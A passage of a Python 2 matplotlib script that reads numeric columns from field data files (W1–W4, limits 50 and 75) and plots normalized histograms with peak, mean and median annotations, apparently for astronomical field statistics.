(str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W2_50 = q_W2_50read[q_W2_50read < 10]\nq_W3_50read = np.loadtxt('fieldshistW3_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W3_50 = q_W3_50read[q_W3_50read < 10]\nq_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_50 = q_W4_50read[q_W4_50read < 10]\nq_W1_75read = np.loadtxt('fieldshistW1_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W1_75 = q_W1_75read[q_W1_75read < 10]\nq_W2_75read = np.loadtxt('fieldshistW2_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W2_75 = q_W2_75read[q_W2_75read < 10]\nq_W3_75read = np.loadtxt('fieldshistW3_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W3_75 = q_W3_75read[q_W3_75read < 10]\nq_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_75 = q_W4_75read[q_W4_75read < 10]\n\nx = linspace(0,3,500)\n\ngauss_q_W1_50 = gaussian_kde(q_W1_50)\ngauss_q_W2_50 = gaussian_kde(q_W2_50)\ngauss_q_W3_50 = gaussian_kde(q_W3_50)\ngauss_q_W4_50 = gaussian_kde(q_W4_50)\ngauss_q_W1_75 = gaussian_kde(q_W1_75)\ngauss_q_W2_75 = gaussian_kde(q_W2_75)\ngauss_q_W3_75 = gaussian_kde(q_W3_75)\ngauss_q_W4_75 = gaussian_kde(q_W4_75)\n\nplt.subplot(4,5,16)\nrangemax=8\nn_q_W1_50, bins_q_W1_50, patches = plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W2_50, bins_q_W2_50, patches = plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W3_50, bins_q_W3_50, patches = plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W1_75, bins_q_W1_75, patches = plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W2_75, bins_q_W2_75, patches = plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W3_75, bins_q_W3_75, patches = plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\n#plt.plot(x,gauss_q_W1_50(x),'b', linewidth=0.5)\nax=plt.subplot(4,5,16)\n#s = \"50: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W1_50(x))],np.average(q_W1_50),np.median(q_W1_50))\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50)) # only the peak depends on the binning\nax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)\n#s = \"50: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W2_50(x))],np.average(q_W2_50),np.median(q_W2_50))\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W2_50[np.argmax(n_q_W2_50)],np.average(q_W2_50),np.median(q_W2_50))\nax.text(0.15, 0.6, s, fontsize=5, color='g',transform=ax.transAxes)\n#s = \"50: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W3_50(x))],np.average(q_W3_50),np.median(q_W3_50))\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W3_50[np.argmax(n_q_W3_50)],np.average(q_W3_50),np.median(q_W3_50))\nax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)\n#s = \"50: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W4_50(x))],np.average(q_W4_50),np.median(q_W4_50))\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\n#s = \"75: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W1_75(x))],np.average(q_W1_75),np.median(q_W1_75))\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W1_75[np.argmax(n_q_W1_75)],np.average(q_W1_75),np.median(q_W1_75))\nax.text(0.15, 0.7, s, fontsize=5, color='b',transform=ax.transAxes)\n#s = \"75: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W2_75(x))],np.average(q_W2_75),np.median(q_W2_75))\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W2_75[np.argmax(n_q_W2_75)],np.average(q_W2_75),np.median(q_W2_75))\nax.text(0.15, 0.5, s, fontsize=5, color='g',transform=ax.transAxes)\n#s = \"75: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W3_75(x))],np.average(q_W3_75),np.median(q_W3_75))\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W3_75[np.argmax(n_q_W3_75)],np.average(q_W3_75),np.median(q_W3_75))\nax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)\n#s = \"75: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W4_75(x))],np.average(q_W4_75),np.median(q_W4_75))\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'${\\zeta_\\frac{M_{rms}^2}{r}}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 13\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W1_50 %.3f W1_75 %.3f \\n W2_50 %.3f W2_75 %.3f \\n W3_50 %.3f W3_75 %.3f \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W1_50.size)/q_W1_50read.size, float(q_W1_75.size)/q_W1_75read.size, float(q_W2_50.size)/q_W2_50read.size, float(q_W2_75.size)/q_W2_75read.size, float(q_W3_50.size)/q_W3_50read.size, float(q_W3_75.size)/q_W3_75read.size, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)\n\ncols=27\nq_W1_50read = np.loadtxt('fieldshistW1_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W1_50 = q_W1_50read[q_W1_50read < 10]\nq_W2_50read = np.loadtxt('fieldshistW2_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W2_50 = q_W2_50read[q_W2_50read < 10]\nq_W3_50read = np.loadtxt('fieldshistW3_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W3_50 = q_W3_50read[q_W3_50read < 10]\nq_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_50 = q_W4_50read[q_W4_50read < 10]\nq_W1_75read = np.loadtxt('fieldshistW1_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W1_75 = q_W1_75read[q_W1_75read < 10]\nq_W2_75read = np.loadtxt('fieldshistW2_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W2_75 = q_W2_75read[q_W2_75read < 10]\nq_W3_75read = np.loadtxt('fieldshistW3_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W3_75 = q_W3_75read[q_W3_75read < 10]\nq_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_75 = q_W4_75read[q_W4_75read < 10]\n\nx = linspace(0,3,500)\n\ngauss_q_W1_50 = gaussian_kde(q_W1_50)\ngauss_q_W2_50 = gaussian_kde(q_W2_50)\ngauss_q_W3_50 = gaussian_kde(q_W3_50)\ngauss_q_W4_50 = gaussian_kde(q_W4_50)\ngauss_q_W1_75 = gaussian_kde(q_W1_75)\ngauss_q_W2_75 = gaussian_kde(q_W2_75)\ngauss_q_W3_75 = gaussian_kde(q_W3_75)\ngauss_q_W4_75 = gaussian_kde(q_W4_75)\n\nplt.subplot(4,5,17)\nrangemax=8\nn_q_W1_50, bins_q_W1_50, patches = plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W2_50, bins_q_W2_50, patches = plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W3_50, bins_q_W3_50, patches = plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W1_75, bins_q_W1_75, patches = plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W2_75, bins_q_W2_75, patches = plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W3_75, bins_q_W3_75, patches = plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nax=plt.subplot(4,5,17)\n#s = \"50: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W1_50(x))],np.average(q_W1_50),np.median(q_W1_50))\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50)) # only the peak depends on the binning\nax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)\n#s = \"50: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W2_50(x))],np.average(q_W2_50),np.median(q_W2_50))\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W2_50[np.argmax(n_q_W2_50)],np.average(q_W2_50),np.median(q_W2_50))\nax.text(0.15, 0.6, s, fontsize=5, color='g',transform=ax.transAxes)\n#s = \"50: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W3_50(x))],np.average(q_W3_50),np.median(q_W3_50))\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W3_50[np.argmax(n_q_W3_50)],np.average(q_W3_50),np.median(q_W3_50))\nax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)\n#s = \"50: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W4_50(x))],np.average(q_W4_50),np.median(q_W4_50))\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\n#s = \"75: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W1_75(x))],np.average(q_W1_75),np.median(q_W1_75))\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W1_75[np.argmax(n_q_W1_75)],np.average(q_W1_75),np.median(q_W1_75))\nax.text(0.15, 0.7, s, fontsize=5, color='b',transform=ax.transAxes)\n#s = \"75: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W2_75(x))],np.average(q_W2_75),np.median(q_W2_75))\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W2_75[np.argmax(n_q_W2_75)],np.average(q_W2_75),np.median(q_W2_75))\nax.text(0.15, 0.5, s, fontsize=5, color='g',transform=ax.transAxes)\n#s = \"75: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W3_75(x))],np.average(q_W3_75),np.median(q_W3_75))\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W3_75[np.argmax(n_q_W3_75)],np.average(q_W3_75),np.median(q_W3_75))\nax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)\n#s = \"75: %.3f,%.3f,%.3f\" % (x[np.argmax(gauss_q_W4_75(x))],np.average(q_W4_75),np.median(q_W4_75))\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))\nax.text(0.15, 0.1, s, fontsize=5, color='r',transform=ax.transAxes)\nplt.xlabel(r'${\\zeta_\\frac{M_{rms}^3}{r}}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 14\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W1_50 %.3f W1_75 %.3f \\n W2_50 %.3f W2_75 %.3f \\n W3_50 %.3f W3_75 %.3f \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W1_50.size)/q_W1_50read.size, float(q_W1_75.size)/q_W1_75read.size, float(q_W2_50.size)/q_W2_50read.size, float(q_W2_75.size)/q_W2_75read.size, float(q_W3_50.size)/q_W3_50read.size, float(q_W3_75.size)/q_W3_75read.size, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)\n\ncols=29\nq_W1_50read = np.loadtxt('fieldshistW1_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W1_50 = q_W1_50read[q_W1_50read < 10]\nq_W2_50read = np.loadtxt('fieldshistW2_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W2_50 = q_W2_50read[q_W2_50read < 10]\nq_W3_50read = np.loadtxt('fieldshistW3_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W3_50 = q_W3_50read[q_W3_50read < 10]\nq_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_50 = q_W4_50read[q_W4_50read < 10]\nq_W1_75read = np.loadtxt('fieldshistW1_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W1_75 = q_W1_75read[q_W1_75read < 10]\nq_W2_75read = np.loadtxt('fieldshistW2_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W2_75 = q_W2_75read[q_W2_75read < 10]\nq_W3_75read = np.loadtxt('fieldshistW3_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W3_75 = q_W3_75read[q_W3_75read < 10]\nq_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_75 = q_W4_75read[q_W4_75read < 10]\n\nplt.subplot(4,5,18)\nrangemax=7\nn_q_W1_50, bins_q_W1_50, patches = plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W2_50, bins_q_W2_50, patches = plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W3_50, bins_q_W3_50, patches = plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W1_75, bins_q_W1_75, patches = plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W2_75, bins_q_W2_75, patches = plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W3_75, bins_q_W3_75, patches = plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nplt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nax=plt.subplot(4,5,18)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W1_50[np.argmax(n_q_W1_50)],np.average(q_W1_50),np.median(q_W1_50))\nax.text(0.15, 0.8, s, fontsize=5, color='b',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W2_50[np.argmax(n_q_W2_50)],np.average(q_W2_50),np.median(q_W2_50))\nax.text(0.15, 0.6, s, fontsize=5, color='g',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W3_50[np.argmax(n_q_W3_50)],np.average(q_W3_50),np.median(q_W3_50))\nax.text(0.15, 0.4, s, fontsize=5, color='r',transform=ax.transAxes)\ns = \"50: %.3f,%.3f,%.3f\" % (bins_q_W4_50[np.argmax(n_q_W4_50)],np.average(q_W4_50),np.median(q_W4_50))\nax.text(0.15, 0.2, s, fontsize=5, color='k',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W1_75[np.argmax(n_q_W1_75)],np.average(q_W1_75),np.median(q_W1_75))\nax.text(0.15, 0.7, s, fontsize=5, color='b',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W2_75[np.argmax(n_q_W2_75)],np.average(q_W2_75),np.median(q_W2_75))\nax.text(0.15, 0.5, s, fontsize=5, color='g',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W3_75[np.argmax(n_q_W3_75)],np.average(q_W3_75),np.median(q_W3_75))\nax.text(0.15, 0.3, s, fontsize=5, color='r',transform=ax.transAxes)\ns = \"75: %.3f,%.3f,%.3f\" % (bins_q_W4_75[np.argmax(n_q_W4_75)],np.average(q_W4_75),np.median(q_W4_75))\nax.text(0.15, 0.1, s, fontsize=5, color='k',transform=ax.transAxes)\nplt.xlabel(r'$\\zeta_\\frac{zM}{r}$', fontsize=15)\nplt.ylabel(\"Normalized cnts\", fontsize=7)\nplt.tick_params(axis='x', labelsize=6)\nplt.tick_params(axis='y', labelsize=6)\nplt.setp(plt.xticks()[1], rotation=90)\n\nsubplot = 15\nprint \"finished subplot %d/16; fraction of points inside the q < 10 cut: \\n W1_50 %.3f W1_75 %.3f \\n W2_50 %.3f W2_75 %.3f \\n W3_50 %.3f W3_75 %.3f \\n W4_50 %.3f W4_75 %.3f \" % (subplot, float(q_W1_50.size)/q_W1_50read.size, float(q_W1_75.size)/q_W1_75read.size, float(q_W2_50.size)/q_W2_50read.size, float(q_W2_75.size)/q_W2_75read.size, float(q_W3_50.size)/q_W3_50read.size, float(q_W3_75.size)/q_W3_75read.size, float(q_W4_50.size)/q_W4_50read.size, float(q_W4_75.size)/q_W4_75read.size)\n\ncols=31\nq_W1_50read = np.loadtxt('fieldshistW1_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W1_50 = q_W1_50read[q_W1_50read < 10]\nq_W2_50read = np.loadtxt('fieldshistW2_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W2_50 = q_W2_50read[q_W2_50read < 10]\nq_W3_50read = np.loadtxt('fieldshistW3_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W3_50 = q_W3_50read[q_W3_50read < 10]\nq_W4_50read = np.loadtxt('fieldshistW4_50_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_50 = q_W4_50read[q_W4_50read < 10]\nq_W1_75read = np.loadtxt('fieldshistW1_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W1_75 = q_W1_75read[q_W1_75read < 10]\nq_W2_75read = np.loadtxt('fieldshistW2_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W2_75 = q_W2_75read[q_W2_75read < 10]\nq_W3_75read = np.loadtxt('fieldshistW3_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W3_75 = q_W3_75read[q_W3_75read < 10]\nq_W4_75read = np.loadtxt('fieldshistW4_75_%s_%s_size%s_i%s.lst' % (str(sys.argv[1]),str(sys.argv[2]),str(sys.argv[4]),str(sys.argv[5])), usecols=[cols], unpack=True)\nq_W4_75 = q_W4_75read[q_W4_75read < 10]\n\nplt.subplot(4,5,19)\nrangemax=10\nn_q_W1_50, bins_q_W1_50, patches = plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W2_50, bins_q_W2_50, patches = plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W3_50, bins_q_W3_50, patches = plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W4_50, bins_q_W4_50, patches = plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax])\nn_q_W1_75, bins_q_W1_75, patches = plt.hist(q_W1_75, histtype='step', color='b', label='W1_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W2_75, bins_q_W2_75, patches = plt.hist(q_W2_75, histtype='step', color='g', label='W2_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W3_75, bins_q_W3_75, patches = plt.hist(q_W3_75, histtype='step', color='r', label='W3_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nn_q_W4_75, bins_q_W4_75, patches = plt.hist(q_W4_75, histtype='step', color='k', label='W4_75', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, rangemax], linestyle='dotted')\nplt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=int(sys.argv[3]), range=[0, 